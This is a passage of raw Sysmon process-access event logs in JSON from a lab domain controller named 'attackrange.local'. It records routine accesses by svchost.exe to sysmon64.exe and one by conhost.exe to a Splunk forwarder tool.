C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1812,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1813,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1814,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1815,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1816,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1817,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1818,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.880","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1819,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.880\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001023940300}\r\nTargetProcessId: 3748\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 